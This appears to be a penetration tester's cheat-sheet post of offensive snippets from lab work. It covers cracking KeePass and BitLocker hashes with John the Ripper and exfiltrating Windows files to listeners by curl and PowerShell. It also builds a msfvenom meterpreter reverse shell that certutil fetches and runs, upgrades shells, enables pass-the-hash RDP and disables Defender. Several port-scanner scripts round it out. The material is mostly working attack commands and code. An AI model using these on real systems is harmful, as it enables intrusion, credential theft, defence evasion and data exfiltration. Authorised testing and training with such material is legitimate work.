This is a collection of Juicy Snippets that I’ve used. Most of these scenarios are rare use cases, but that’s why THEY’RE JUICY!


Cracking the KeePass database with John the Ripper

keepass2john Database.kdbx > Keepasshash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txt

File Transfer from Windows

Upload Server (Python)

# Listen for uploads (default port is 8000)
python3 -m pip install --user uploadserver
python3 -m uploadserver
# With basic auth:
# python3 -m uploadserver --basic-auth hello:world

# Send a file (the field name must be "files"; the server listens on 8000 unless you passed a port)
curl -X POST http://192.168.122.182:8000/upload -F 'files=@NTUSER.dat'
# With basic auth:
# curl -X POST http://HOST/upload -F 'files=@file.txt' -u hello:world

Certutil

# certutil -encode wraps the output in BEGIN/END CERTIFICATE lines; findstr /v /c:- drops them
certutil -encode data.txt tmp.b64 && findstr /v /c:- tmp.b64 > data.b64
certutil -encode playercounter-1.0-SNAPSHOT.jar tmp.b64 && findstr /v /c:- tmp.b64 > data.b64

Openssl

openssl base64 -d < loki-config-s3-base64encoded.txt

Certutil download (Windows)

certutil -urlcache -f http://10.10.14.2:4245/expl.exe %temp%/expl.exe

PowerShell Base64 Web Upload

Another way to use PowerShell and base64-encoded files for upload operations is Invoke-WebRequest or Invoke-RestMethod together with Netcat. Netcat listens on a port we choose and PowerShell sends the base64 string as the body of a POST request. Finally, we copy the body out of the Netcat output and run it through base64 -d to turn the string back into a file.

PowerShell: base64-encode the file and POST it to the listener

PS C:\htb> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte))
PS C:\htb> Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64

-Encoding Byte is Windows PowerShell 5.1 syntax; on PowerShell 7 use Get-Content -AsByteStream instead.

We catch the base64 data with Netcat and use the base64 application with the decode option to convert the string to the file.

Catch the POST with Netcat

vxdf@htb[/htb]$ nc -lvnp 8000

listening on [any] 8000 ...
connect to [192.168.49.128] from (UNKNOWN) [192.168.49.129] 50923
POST / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
Content-Type: application/x-www-form-urlencoded
Host: 192.168.49.128:8000
Content-Length: 1820
Connection: Keep-Alive

...SNIP...

Decode the base64 string back into the file

vxdf@htb[/htb]$ echo <base64> | base64 -d -w 0 > hosts
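The Netcat step above means scrolling through headers and copy-pasting a long base64 blob by hand. As an added example (not code from the original page or from HTB), here is a small Python listener that does the catching and decoding itself: it accepts the POST sent by the Invoke-WebRequest line, strips any whitespace or line breaks, validates and decodes the base64 body and writes the result to disk. The X-Filename header is an assumption of this example (the one-liner above sends none), so uploads without it land under a default name, and the name is reduced to its last path component so a hostile client cannot write outside the output directory.

```python
# Added example, not from the original page or from HTB: a small HTTP listener
# that replaces the Netcat + copy/paste step. It accepts the base64 POST sent by
# Invoke-WebRequest, decodes the body and writes the file to disk.
# The X-Filename header is an assumption of this example (the one-liner above
# sends none); without it the upload lands under DEFAULT_NAME.
import base64
import binascii
import os
from http.server import BaseHTTPRequestHandler, HTTPServer

OUTPUT_DIR = "."
DEFAULT_NAME = "upload.bin"


def safe_name(name):
    """Reduce a client-supplied name to its last path component so a hostile
    client cannot write outside OUTPUT_DIR (handles both / and \\ separators)."""
    name = os.path.basename((name or "").replace("\\", "/"))
    return DEFAULT_NAME if name in ("", ".", "..") else name


def decode_upload(body, filename=None):
    """Decode a base64 POST body. Whitespace and line breaks (as produced by
    certutil -encode or a wrapped copy/paste) are tolerated; anything else that
    is not in the base64 alphabet raises ValueError."""
    try:
        raw = base64.b64decode(b"".join(body.split()), validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError(f"body is not valid base64: {exc}") from exc
    return safe_name(filename), raw


class CatchHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length)
        try:
            name, raw = decode_upload(body, self.headers.get("X-Filename"))
        except ValueError as exc:
            self.send_error(400, str(exc))
            return
        with open(os.path.join(OUTPUT_DIR, name), "wb") as fh:
            fh.write(raw)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(f"wrote {len(raw)} bytes to {name}\n".encode())


def serve(host="0.0.0.0", port=8000):
    """Block and catch uploads until Ctrl-C."""
    with HTTPServer((host, port), CatchHandler) as httpd:
        print(f"catching base64 POSTs on {host}:{port}")
        try:
            httpd.serve_forever()
        except KeyboardInterrupt:
            pass


if __name__ == "__main__":
    serve()
```

Run it in place of nc -lvnp 8000 and send the file as before; to pick the output name, add a header on the client side, e.g. Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64 -Headers @{"X-Filename"="hosts"}.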

Mount Windows VHD on attack linux machine

If you’ve acquired a VHD file try this

Extract the partition image from the VHD (7-Zip understands the VHD container)

7z x Backup.vhd 

...SNIP...

'1.Basic data partition.img' 

Extract the BitLocker hash

bitlocker2john -i '1.Basic data partition.img' 

Create Hash File

echo '$bitlocker$0$16$60d83def3e335699830cc42793dae6e5$1048576$12$80b20a04341fd80103000000$60$ae149c9c17975483390d2afb7ff75c3e3380733976fa7d02bb29caebece6076c3c29096fc341a916c79b0db656a1f28e9f186e8b201c38653f64443a' > bitlock

Crack with JTR

john --wordlist=../mut_pass.list bitlock

Attach the VHD, unlock it with the cracked password and mount it

sudo modprobe nbd max_part=8        # max_part makes the partitions show up as /dev/nbd0p1, p2, ...
sudo qemu-nbd -c /dev/nbd0 Backup.vhd
lsblk /dev/nbd0                      # find the BitLocker partition (p1 below is an assumption)
sudo cryptsetup open --type bitlk /dev/nbd0p1 backup   # prompts for the cracked password; needs cryptsetup >= 2.3 (dislocker is an alternative)
sudo mount -o ro /dev/mapper/backup /mnt
# when done: sudo umount /mnt && sudo cryptsetup close backup && sudo qemu-nbd -d /dev/nbd0

Iterator

Bash Iterator

#!/bin/bash 
for i in {1..10}; do 
	echo "Iteration $i" 
done

Curl a numbered range of URLs

#!/bin/bash
# e.g. enumerate WordPress author IDs via /?author=N
for i in {1..10}; do
	curl -s "http://blog.inlanefreight.local/?author=$i"
done

Add vhost to /etc/hosts

vxdf@htb[/htb]$ IP=10.129.42.195
vxdf@htb[/htb]$ printf "%s\t%s\n\n" "$IP" "app.inlanefreight.local dev.inlanefreight.local" | sudo tee -a /etc/hosts


Shells

Upgrade Shell No TTY? No Problem

With python installed

python3 -c 'import pty; pty.spawn("/bin/bash")'

No python? No problem

Victim (established reverse shell)

Ctrl-Z    # background the reverse shell

Attacker host

stty raw -echo   # stop the local terminal from echoing and interpreting keystrokes
fg               # bring the shell back; raw input is now forwarded to it
reset            # type this blind to re-initialise the terminal

Back on the reverse shell

export SHELL=bash
export TERM=xterm-256color
stty rows 38 columns 116   # use the values from `stty size` on the attacker terminal

Now you can use Vim, tmux, sqlclient, ftp and mysql in your reverse shell.


Windows MSFVenom

Meterpreter shell with CertUtil (Windows)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=4244 -f exe -o expl.exe   # msfvenom resolves an interface name like tun0 to its address

Start HTTP server

python3 -m http.server 4245

On the remote machine

certutil -urlcache -f http://<tun0 IP>:4245/expl.exe %temp%/expl.exe

Start the exe (have a multi/handler for windows/x64/meterpreter/reverse_tcp listening on 4244 first, or the callback is lost)

start %temp%/expl.exe

Restricted Admin mode for RDP (Windows)

This key does not turn RDP on: setting DisableRestrictedAdmin to 0 enables Restricted Admin mode, which lets you authenticate to RDP with an NT hash (e.g. xfreerdp /pth) instead of a password. Needs local admin.

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

To actually enable RDP (and allow it through the firewall):

reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Disable Defender real-time monitoring in PowerShell (needs local admin; has no effect while Tamper Protection is on)

Set-MpPreference -DisableRealtimeMonitoring $true

Check whether real-time protection is on (Get-MpPreference has no EnableRealtimeProtection property; the status lives in Get-MpComputerStatus)

Get-MpComputerStatus | Select-Object -ExpandProperty RealTimeProtectionEnabled

LOTL Port Scanning

Living Off The Land port scanning

Python

Python is ubiquitous and often installed on Linux and sometimes even on Windows servers. Here’s a basic port scanner using Python’s socket library:

import socket

target = "example.com"
ports = range(1, 1025)

for port in ports:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(1)
    result = s.connect_ex((target, port))
    if result == 0:
        print(f"Port {port} is open.")
    s.close()

To run this code, you’d typically save it to a .py file and execute it with Python. In a LOTL scenario you would rather run it straight from the command line as a one-liner. Note that socket.create_connection() raises on a closed port and would abort a list comprehension at the first miss, so the one-liner uses connect_ex(), which returns an error code instead, plus a default timeout so filtered ports don’t hang the loop:

python -c 'import socket; socket.setdefaulttimeout(1); t="example.com"; [print(f"Port {p} is open.") for p in range(1,1025) if socket.socket().connect_ex((t,p))==0]'
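Sequential scanning with a one-second timeout means a host that drops packets costs up to 1024 seconds for the range above. As an added example (not code from the original page), here is the same connect scanner generalised: a thread pool runs the probes concurrently, each probe keeps its own timeout and never raises into the loop, and an optional banner grab records what services that speak first (SSH, FTP, SMTP) say. It is standard library only, so it still fits a living-off-the-land situation. The example.com target is an assumption; local_listener is a constructed fixture so the scanner can be exercised offline against a port on 127.0.0.1.

```python
# Added example (not code from the original page): the sequential scanner above,
# generalised into a threaded connect scanner with an explicit per-port timeout
# and an optional banner grab. Standard library only, so it still works in a
# living-off-the-land situation where nothing but the interpreter is present.
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe(target, port, timeout=1.0, grab_banner=False):
    """One TCP connect attempt. Returns (port, is_open, banner_bytes)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        # connect_ex() reports failure as a return code instead of raising, so a
        # closed or filtered port never aborts the scan (create_connection() would)
        if s.connect_ex((target, port)) != 0:
            return port, False, b""
        banner = b""
        if grab_banner:
            try:
                banner = s.recv(128)  # services like SSH/FTP/SMTP talk first
            except (socket.timeout, OSError):
                pass  # HTTP, SMB etc. wait for the client, so no banner is normal
        return port, True, banner
    except OSError:  # e.g. name resolution failure
        return port, False, b""
    finally:
        s.close()


def scan(target, ports, timeout=1.0, workers=64, grab_banner=False):
    """Probe `ports` on `target` concurrently; returns {open_port: banner}."""
    found = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: probe(target, p, timeout, grab_banner), ports)
        for port, is_open, banner in results:
            if is_open:
                found[port] = banner
    return found


def local_listener(banner=b"SSH-2.0-demo\r\n"):
    """Constructed fixture so the scanner can be exercised offline: a listener on
    127.0.0.1 (ephemeral port) that greets every client with `banner`. Returns the
    listening socket; read the port from srv.getsockname()[1]."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return  # listener was shut down
            try:
                conn.sendall(banner)
            finally:
                conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv


def stop_listener(srv):
    """shutdown() wakes the thread blocked in accept(); close() alone would not."""
    try:
        srv.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    srv.close()


if __name__ == "__main__":
    # The target is an assumption; point it at a host you are authorised to test.
    for port, banner in sorted(scan("example.com", range(1, 1025), grab_banner=True).items()):
        print(f"Port {port} is open." + (f" banner={banner!r}" if banner else ""))
```

Keep workers modest on a noisy network or a fragile target: 64 concurrent connects is already enough to trip simple rate-based alerting, and every open port you banner-grab leaves a log line on the service.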

Bash

On Linux, bash itself can open TCP connections through the /dev/tcp pseudo-device (a bash feature, not available in plain sh or dash). Wrapping each attempt in timeout keeps the loop from stalling on filtered ports, which otherwise block until the kernel's connect timeout expires:

#!/bin/bash

target="example.com"
for port in {1..1024}; do
    timeout 1 bash -c "echo >/dev/tcp/$target/$port" > /dev/null 2>&1 && echo "Port $port is open."
done

Inline:

target="example.com"; for port in {1..1024}; do timeout 1 bash -c "echo >/dev/tcp/$target/$port" > /dev/null 2>&1 && echo "Port $port is open."; done

PowerShell

PowerShell is incredibly powerful and offers a breadth of functionality on Windows machines. Here’s a simple port scanner in PowerShell:

$target = "example.com"
1..1024 | ForEach-Object {
    $port = $_
    $TCPClient = New-Object System.Net.Sockets.TcpClient
    Try {
        $TCPClient.Connect($target, $port)
        $TCPClient.Close()
        Write-Host "Port $port is open."
    } Catch {}
}

This script uses the .NET TcpClient class to attempt a connection to each port on the target; if Connect() returns without throwing, the port is open. Connect() has no short timeout of its own, so a filtered port (no RST coming back) stalls that iteration for the full TCP connect timeout, roughly 20 seconds on Windows.

Single port

Test-NetConnection -ComputerName $IP -Port 80

Inline:

1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("$IP", $_)) "TCP port $_ is open"} 2>$null

Alternative:

$target="example.com"; 1..1024 | % { $port=$_; $TCPClient=New-Object System.Net.Sockets.TcpClient; Try{$TCPClient.Connect($target, $port); $TCPClient.Close(); Write-Host "Port $port is open."}Catch{}}

Netcat

Netcat reads and writes network connections and is present on many systems. With -z it only tests whether the port accepts a connection and exits 0 on success, so the exit status is all the loop needs; grepping for "succeeded" ties the script to the OpenBSD netcat's exact wording and prints the matched line on top of the echo.

#!/bin/bash

target="example.com"
for port in {1..1024}; do
    nc -z -w1 "$target" "$port" 2>/dev/null && echo "Port $port is open."
done

Inline:

target="example.com"; for port in {1..1024}; do nc -z -w1 "$target" "$port" 2>/dev/null && echo "Port $port is open."; done